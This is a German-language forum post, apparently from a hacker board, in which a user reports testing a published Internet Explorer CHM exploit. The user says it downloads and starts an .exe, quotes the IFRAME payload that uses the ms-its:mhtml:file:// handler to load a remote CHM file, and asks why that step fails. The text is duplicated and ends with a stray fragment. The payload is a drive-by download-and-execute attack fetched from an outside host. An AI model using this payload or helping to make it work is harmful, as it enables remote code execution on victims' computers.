![[HaBo]](/styles/default/logoklein.png){kind=small}
hi
ich hab mal versucht diesen exploit zu testen --> http://www.securityfocus.com/archive/1/354447
habe auch die LAUNCH.HTML in chm.chm konvertiert.
geht auch soweit, die *.exe wird gedownloaded u. gestartet
im 2. teil steht ja das man mit:
<IFRAME SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
die datei chm.chm starten kann.
nur genau das geht nicht! was bedeutet denn mhtml:file://C:\ss.MHT! ?
wenn ich das weglasse gehts, bis auf das activx im browser aktiviert sein muss.
kann mir da jemand weiterhelfen?
thx
ich hab mal versucht diesen exploit zu testen --> http://www.securityfocus.com/archive/1/354447
habe auch die LAUNCH.HTML in chm.chm konvertiert.
geht auch soweit, die *.exe wird gedownloaded u. gestartet
im 2. teil steht ja das man mit:
<IFRAME SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
die datei chm.chm starten kann.
nur genau das geht nicht! was bedeutet denn mhtml:file://C:\ss.MHT! ?
wenn ich das weglasse gehts, bis auf das activx im browser aktiviert sein muss.
kann mir da jemand weiterhelfen?
thx
MSITStore:ss.chm::